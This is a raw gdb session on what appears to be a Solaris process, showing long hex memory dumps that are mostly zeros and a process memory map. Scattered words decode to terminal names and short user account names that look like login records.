0x24c60 <_edata+9382>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24c70 <_edata+9398>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24c80 <_edata+9414>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24c90 <_edata+9430>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24ca0 <_edata+9446>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24cb0 <_edata+9462>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24cc0 <_edata+9478>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24cd0 <_edata+9494>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24ce0 <_edata+9510>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24cf0 <_edata+9526>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24d00 <_edata+9542>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24d10 <_edata+9558>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24d20 <_edata+9574>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24d30 <_edata+9590>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24d40 <_edata+9606>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24d50 <_edata+9622>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24d60 <_edata+9638>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24d70 <_edata+9654>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24d80 <_edata+9670>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24d90 <_edata+9686>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24da0 <_edata+9702>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24db0 <_edata+9718>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24dc0 <_edata+9734>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24dd0 <_edata+9750>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24de0 <_edata+9766>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24df0 <_edata+9782>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24e00 <_edata+9798>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24e10 <_edata+9814>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24e20 <_edata+9830>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24e30 <_edata+9846>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24e40 <_edata+9862>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24e50 <_edata+9878>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24e60 <_edata+9894>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24e70 <_edata+9910>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24e80 <_edata+9926>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24e90 <_edata+9942>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24ea0 <_edata+9958>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24eb0 <_edata+9974>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24ec0 <_edata+9990>:  0x00000000      0x00000000      0x00000000      0x00000000
0x24ed0 <_edata+10006>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24ee0 <_edata+10022>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24ef0 <_edata+10038>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24f00 <_edata+10054>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24f10 <_edata+10070>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24f20 <_edata+10086>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24f30 <_edata+10102>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24f40 <_edata+10118>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24f50 <_edata+10134>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24f60 <_edata+10150>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24f70 <_edata+10166>: 0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x24f80 <_edata+10182>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24f90 <_edata+10198>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24fa0 <_edata+10214>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24fb0 <_edata+10230>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24fc0 <_edata+10246>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24fd0 <_edata+10262>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24fe0 <_edata+10278>: 0x00000000      0x00000000      0x00000000      0x00000000
0x24ff0 <_edata+10294>: 0x00000000      0x00000000      0x00000000      0x00000000
0x25000 <_edata+10310>: 0x00000000      0x00000000      0x00000000      0x00000000
0x25010 <_edata+10326>: 0x00000000      0x00000000      0x00000000      0x00000000
0x25020 <_edata+10342>: 0x00000000      0x00000000      0x00000000      0x00000000
0x25030 <_edata+10358>: 0x00000000      0x00000000      0x00000000      0x00000000
0x25040 <_edata+10374>: 0x00000000      0x00000000      0x00000000      0x00000000
0x25050 <_edata+10390>: 0x00000000      0x00000000      0x00000000      0x00000000
0x25060 <_edata+10406>: 0x00000000      0x00000000      0x00000000      0x00000000
0x25070 <_edata+10422>: 0x00000000      0x00000000      0x00000000      0x00000000
0x25080 <_edata+10438>: 0x00000000      0x00000000      0x00000000      0x00000000
0x25090 <_edata+10454>: 0x00000000      0x00000000      0x00000000      0x00000000
0x250a0 <_edata+10470>: 0x00000000      0x00000000      0x00000000      0x00000000
0x250b0 <_edata+10486>: 0x00000000      0x00000000      0x00000000      0x00000000
0x250c0 <_edata+10502>: 0x00000000      0x00000000      0x00000000      0x00000000
0x250d0 <_edata+10518>: 0x00000000      0x00000000      0x00000000      0x00000000
0x250e0 <_edata+10534>: 0x00000000      0x00000000      0x00000000      0x00000000
0x250f0 <_edata+10550>: 0x00000000      0x00000000      0x00000000      0x00000000
(gdb) info proc map
process 1086 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap

Mapped address spaces:

        Start Addr   End Addr       Size     Offset   Flags
           0x10000    0x13fff     0x4000          0 ----r-x
           0x22000    0x23fff     0x2000     0x2000 ----rwx
           0x24000    0x35fff    0x12000          0 --b-rwx
        0xff280000 0xff32bfff    0xac000          0 ----r-x
        0xff33c000 0xff343fff     0x8000    0xac000 ----rwx
        0xff370000 0xff371fff     0x2000          0 ----rwx
        0xff380000 0xff383fff     0x4000          0 ----r-x
        0xff390000 0xff391fff     0x2000          0 ----rwx
        0xff3b0000 0xff3dffff    0x30000          0 ----r-x
        0xff3e0000 0xff3e1fff     0x2000    0x30000 ----rwx
        0xff3e2000 0xff3e3fff     0x2000          0 ----rwx
        0xffbee000 0xffbeffff     0x2000          0 -s--rwx

(gdb) x/96x 0x34000
0x34000:        0x00000000      0x00000000      0x00000000      0x00000000
0x34010:        0x00000000      0x00000000      0x00000000      0x00000000
0x34020:        0x00000000      0x00000000      0x62617a7a      0x00000000
0x34030:        0x00000000      0x00000000      0x00000000      0x00000000
0x34040:        0x00000000      0x00000000      0x74732f35      0x7074732f
0x34050:        0x35000000      0x00000000      0x00000000      0x00000000
0x34060:        0x00000000      0x00000000      0x00000000      0x00007467
0x34070:        0x00080000      0x00000000      0x544b6439      0x0001fa71
0x34080:        0x00000000      0x00000000      0x00000000      0x00000000
0x34090:        0x00000000      0x00000000      0x00000000      0x00000000
0x340a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34100:        0x00000000      0x00000000      0x00000000      0x00000000
0x34110:        0x00000000      0x00000000      0x00000000      0x00000000
0x34120:        0x00000000      0x00000000      0x00000000      0x00000000
0x34130:        0x00000000      0x00000000      0x00000000      0x00000000
0x34140:        0x00000000      0x00000000      0x00000000      0x00000000
0x34150:        0x00000000      0x00000000      0x00000000      0x00000000
0x34160:        0x00000000      0x00000000      0x00000000      0x00000000
0x34170:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x34180:        0x00000000      0x00000000      0x00000000      0x00000000
0x34190:        0x00000000      0x00000000      0x0000002f      0x62617a7a
0x341a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x341b0:        0x00000000      0x00000000      0x00000000      0x74732f36
0x341c0:        0x7074732f      0x36000000      0x00000000      0x00000000
0x341d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x341e0:        0x00007497      0x00080000      0x00000000      0x544b6438
0x341f0:        0x000e757d      0x00000000      0x00000000      0x00000000
0x34200:        0x00000000      0x00000000      0x00000000      0x00000000
0x34210:        0x00000000      0x00000000      0x00000000      0x00000000
0x34220:        0x00000000      0x00000000      0x00000000      0x00000000
0x34230:        0x00000000      0x00000000      0x00000000      0x00000000
0x34240:        0x00000000      0x00000000      0x00000000      0x00000000
0x34250:        0x00000000      0x00000000      0x00000000      0x00000000
0x34260:        0x00000000      0x00000000      0x00000000      0x00000000
0x34270:        0x00000000      0x00000000      0x00000000      0x00000000
0x34280:        0x00000000      0x00000000      0x00000000      0x00000000
0x34290:        0x00000000      0x00000000      0x00000000      0x00000000
0x342a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x342f0:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x34300:        0x00000000      0x00000000      0x00000000      0x0000002f
0x34310:        0x62617a7a      0x00000000      0x00000000      0x00000000
0x34320:        0x00000000      0x00000000      0x00000000      0x00000000
0x34330:        0x74732f37      0x7074732f      0x37000000      0x00000000
0x34340:        0x00000000      0x00000000      0x00000000      0x00000000
0x34350:        0x00000000      0x000074a9      0x00080000      0x00000000
0x34360:        0x544b6438      0x000ba288      0x00000000      0x00000000
0x34370:        0x00000000      0x00000000      0x00000000      0x00000000
0x34380:        0x00000000      0x00000000      0x00000000      0x00000000
0x34390:        0x00000000      0x00000000      0x00000000      0x00000000
0x343a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x343f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34400:        0x00000000      0x00000000      0x00000000      0x00000000
0x34410:        0x00000000      0x00000000      0x00000000      0x00000000
0x34420:        0x00000000      0x00000000      0x00000000      0x00000000
0x34430:        0x00000000      0x00000000      0x00000000      0x00000000
0x34440:        0x00000000      0x00000000      0x00000000      0x00000000
0x34450:        0x00000000      0x00000000      0x00000000      0x00000000
0x34460:        0x00000000      0x00000000      0x00000000      0x00000000
0x34470:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x34480:        0x0000002f      0x62617a7a      0x00000000      0x00000000
0x34490:        0x00000000      0x00000000      0x00000000      0x00000000
0x344a0:        0x00000000      0x74732f38      0x7074732f      0x38000000
0x344b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x344c0:        0x00000000      0x00000000      0x000074d9      0x00080000
0x344d0:        0x00000000      0x544b6438      0x0008c36e      0x00000000
0x344e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x344f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34500:        0x00000000      0x00000000      0x00000000      0x00000000
0x34510:        0x00000000      0x00000000      0x00000000      0x00000000
0x34520:        0x00000000      0x00000000      0x00000000      0x00000000
0x34530:        0x00000000      0x00000000      0x00000000      0x00000000
0x34540:        0x00000000      0x00000000      0x00000000      0x00000000
0x34550:        0x00000000      0x00000000      0x00000000      0x00000000
0x34560:        0x00000000      0x00000000      0x00000000      0x00000000
0x34570:        0x00000000      0x00000000      0x00000000      0x00000000
0x34580:        0x00000000      0x00000000      0x00000000      0x00000000
0x34590:        0x00000000      0x00000000      0x00000000      0x00000000
0x345a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x345f0:        0x00000000      0x0000002f      0x62617a7a      0x00000000
(gdb)
0x34600:        0x00000000      0x00000000      0x00000000      0x00000000
0x34610:        0x00000000      0x00000000      0x74732f39      0x7074732f
0x34620:        0x39000000      0x00000000      0x00000000      0x00000000
0x34630:        0x00000000      0x00000000      0x00000000      0x000074f3
0x34640:        0x00080000      0x00000000      0x544b6438      0x0002c7ad
0x34650:        0x00000000      0x00000000      0x00000000      0x00000000
0x34660:        0x00000000      0x00000000      0x00000000      0x00000000
0x34670:        0x00000000      0x00000000      0x00000000      0x00000000
0x34680:        0x00000000      0x00000000      0x00000000      0x00000000
0x34690:        0x00000000      0x00000000      0x00000000      0x00000000
0x346a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x346f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34700:        0x00000000      0x00000000      0x00000000      0x00000000
0x34710:        0x00000000      0x00000000      0x00000000      0x00000000
0x34720:        0x00000000      0x00000000      0x00000000      0x00000000
0x34730:        0x00000000      0x00000000      0x00000000      0x00000000
0x34740:        0x00000000      0x00000000      0x00000000      0x00000000
0x34750:        0x00000000      0x00000000      0x00000000      0x00000000
0x34760:        0x00000000      0x00000000      0x0000002f      0x62617a7a
0x34770:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x34780:        0x00000000      0x00000000      0x00000000      0x732f3130
0x34790:        0x7074732f      0x31300000      0x00000000      0x00000000
0x347a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x347b0:        0x00007501      0x00080000      0x00000000      0x544b6437
0x347c0:        0x000cbf95      0x00000000      0x00000000      0x00000000
0x347d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x347e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x347f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34800:        0x00000000      0x00000000      0x00000000      0x00000000
0x34810:        0x00000000      0x00000000      0x00000000      0x00000000
0x34820:        0x00000000      0x00000000      0x00000000      0x00000000
0x34830:        0x00000000      0x00000000      0x00000000      0x00000000
0x34840:        0x00000000      0x00000000      0x00000000      0x00000000
0x34850:        0x00000000      0x00000000      0x00000000      0x00000000
0x34860:        0x00000000      0x00000000      0x00000000      0x00000000
0x34870:        0x00000000      0x00000000      0x00000000      0x00000000
0x34880:        0x00000000      0x00000000      0x00000000      0x00000000
0x34890:        0x00000000      0x00000000      0x00000000      0x00000000
0x348a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x348b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x348c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x348d0:        0x00000000      0x00000000      0x00000000      0x0000002f
0x348e0:        0x62617a7a      0x00000000      0x00000000      0x00000000
0x348f0:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x34900:        0x732f3131      0x7074732f      0x31310000      0x00000000
0x34910:        0x00000000      0x00000000      0x00000000      0x00000000
0x34920:        0x00000000      0x00007527      0x00080000      0x00000000
0x34930:        0x544b6431      0x000def0a      0x00000000      0x00000000
0x34940:        0x00000000      0x00000000      0x00000000      0x00000000
0x34950:        0x00000000      0x00000000      0x00000000      0x00000000
0x34960:        0x00000000      0x00000000      0x00000000      0x00000000
0x34970:        0x00000000      0x00000000      0x00000000      0x00000000
0x34980:        0x00000000      0x00000000      0x00000000      0x00000000
0x34990:        0x00000000      0x00000000      0x00000000      0x00000000
0x349a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x349f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a50:        0x00000000      0x6a6b7269      0x63680000      0x00000000
0x34a60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a70:        0x00000000      0x732f3132      0x7074732f      0x31320000
(gdb)
0x34a80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34a90:        0x00000000      0x00000000      0x0000083d      0x00080000
0x34aa0:        0x00000000      0x527021bc      0x0001e605      0x00000000
0x34ab0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ac0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ad0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ae0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34af0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34b90:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ba0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34bb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34bc0:        0x00000000      0x00000000      0x64656d69      0x6a61636b
0x34bd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34be0:        0x00000000      0x00000000      0x732f3133      0x7074732f
0x34bf0:        0x31330000      0x00000000      0x00000000      0x00000000
(gdb)
0x34c00:        0x00000000      0x00000000      0x00000000      0x000006b2
0x34c10:        0x00080000      0x00000000      0x52701251      0x00074603
0x34c20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34c90:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ca0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34cb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34cc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34cd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ce0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34cf0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34d30:        0x00000000      0x00000000      0x00000000      0x61676172
0x34d40:        0x61790000      0x00000000      0x00000000      0x00000000
0x34d50:        0x00000000      0x00000000      0x00000000      0x732f3134
0x34d60:        0x7074732f      0x31340000      0x00000000      0x00000000
0x34d70:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x34d80:        0x00001603      0x00080000      0x00000000      0x52524378
0x34d90:        0x00032ffd      0x00000000      0x00000000      0x00000000
0x34da0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34db0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34dc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34dd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34de0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34df0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e00:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34e90:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ea0:        0x00000000      0x00000000      0x00000000      0x0000002f
0x34eb0:        0x6b657662      0x30303031      0x00000000      0x00000000
0x34ec0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ed0:        0x732f3135      0x7074732f      0x31350000      0x00000000
0x34ee0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ef0:        0x00000000      0x0000156f      0x00080000      0x00000000
(gdb)
0x34f00:        0x525241c4      0x00052c9f      0x00000000      0x00000000
0x34f10:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f20:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f30:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f40:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f50:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f60:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f70:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f80:        0x00000000      0x00000000      0x00000000      0x00000000
0x34f90:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fa0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fb0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fc0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fd0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34fe0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34ff0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35000:        0x00000000      0x00000000      0x00000000      0x00000000
0x35010:        0x00000000      0x00000000      0x00000000      0x00000000
0x35020:        0x00000000      0x64687572      0x6c627574      0x00000000
0x35030:        0x00000918      0x00000000      0x00000000      0x00000000
0x35040:        0x00000000      0x00000000      0x00000000      0x00000000
0x35050:        0x00000000      0x00000000      0x00000000      0x00000000
0x35060:        0x00000000      0x00000000      0x00000000      0x00000000
0x35070:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x35080:        0x00000000      0x00000000      0x00000000      0x00000000
0x35090:        0x00000000      0x00000000      0x00000000      0x00000000
0x350a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x350f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35100:        0x00000000      0x00000000      0x00000000      0x00000000
0x35110:        0x00000000      0x00000000      0x00000000      0x00000000
0x35120:        0x00000000      0x00000000      0x00000000      0x00000000
0x35130:        0x00000000      0x00000000      0x00000000      0x00000000
0x35140:        0x00000000      0x00000000      0x00000000      0x00000000
0x35150:        0x00000000      0x00000000      0x00000000      0x00000000
0x35160:        0x00000000      0x00000000      0x00000000      0x00000000
0x35170:        0x00000000      0x00000000      0x00000000      0x00000000
0x35180:        0x00000000      0x00000000      0x00000000      0x00000000
0x35190:        0x00000000      0x00000000      0x00000000      0x00000000
0x351a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x351f0:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x35200:        0x00000000      0x00000000      0x00000000      0x00000000
0x35210:        0x00000000      0x00000000      0x00000000      0x00000000
0x35220:        0x00000000      0x00000000      0x00000000      0x00000000
0x35230:        0x00000000      0x00000000      0x00000000      0x00000000
0x35240:        0x00000000      0x00000000      0x00000000      0x00000000
0x35250:        0x00000000      0x00000000      0x00000000      0x00000000
0x35260:        0x00000000      0x00000000      0x00000000      0x00000000
0x35270:        0x00000000      0x00000000      0x00000000      0x00000000
0x35280:        0x00000000      0x00000000      0x00000000      0x00000000
0x35290:        0x00000000      0x00000000      0x00000000      0x00000000
0x352a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x352f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35300:        0x00000000      0x00000000      0x00000000      0x00000000
0x35310:        0x00000000      0x00000000      0x00000000      0x00000000
0x35320:        0x00000000      0x00000000      0x00000000      0x00000000
0x35330:        0x00000000      0x00000000      0x00000000      0x00000000
0x35340:        0x00000000      0x00000000      0x00000000      0x00000000
0x35350:        0x00000000      0x00000000      0x00000000      0x00000000
0x35360:        0x00000000      0x00000000      0x00000000      0x00000000
0x35370:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x35380:        0x00000000      0x00000000      0x00000000      0x00000000
0x35390:        0x00000000      0x00000000      0x00000000      0x00000000
0x353a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x353f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35400:        0x00000000      0x00000000      0x00000000      0x00000000
0x35410:        0x00000000      0x00000000      0x00000000      0x00000000
0x35420:        0x00000000      0x00000000      0x00000000      0x00000000
0x35430:        0x00000000      0x00000000      0x00000000      0x00000000
0x35440:        0x00000000      0x00000000      0x00000000      0x00000000
0x35450:        0x00000000      0x00000000      0x00000000      0x00000000
0x35460:        0x00000000      0x00000000      0x00000000      0x00000000
0x35470:        0x00000000      0x00000000      0x00000000      0x00000000
0x35480:        0x00000000      0x00000000      0x00000000      0x00000000
0x35490:        0x00000000      0x00000000      0x00000000      0x00000000
0x354a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x354f0:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x35500:        0x00000000      0x00000000      0x00000000      0x00000000
0x35510:        0x00000000      0x00000000      0x00000000      0x00000000
0x35520:        0x00000000      0x00000000      0x00000000      0x00000000
0x35530:        0x00000000      0x00000000      0x00000000      0x00000000
0x35540:        0x00000000      0x00000000      0x00000000      0x00000000
0x35550:        0x00000000      0x00000000      0x00000000      0x00000000
0x35560:        0x00000000      0x00000000      0x00000000      0x00000000
0x35570:        0x00000000      0x00000000      0x00000000      0x00000000
0x35580:        0x00000000      0x00000000      0x00000000      0x00000000
0x35590:        0x00000000      0x00000000      0x00000000      0x00000000
0x355a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x355f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35600:        0x00000000      0x00000000      0x00000000      0x00000000
0x35610:        0x00000000      0x00000000      0x00000000      0x00000000
0x35620:        0x00000000      0x00000000      0x00000000      0x00000000
0x35630:        0x00000000      0x00000000      0x00000000      0x00000000
0x35640:        0x00000000      0x00000000      0x00000000      0x00000000
0x35650:        0x00000000      0x00000000      0x00000000      0x00000000
0x35660:        0x00000000      0x00000000      0x00000000      0x00000000
0x35670:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x35680:        0x00000000      0x00000000      0x00000000      0x00000000
0x35690:        0x00000000      0x00000000      0x00000000      0x00000000
0x356a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35700:        0x00000000      0x00000000      0x00000000      0x00000000
0x35710:        0x00000000      0x00000000      0x00000000      0x00000000
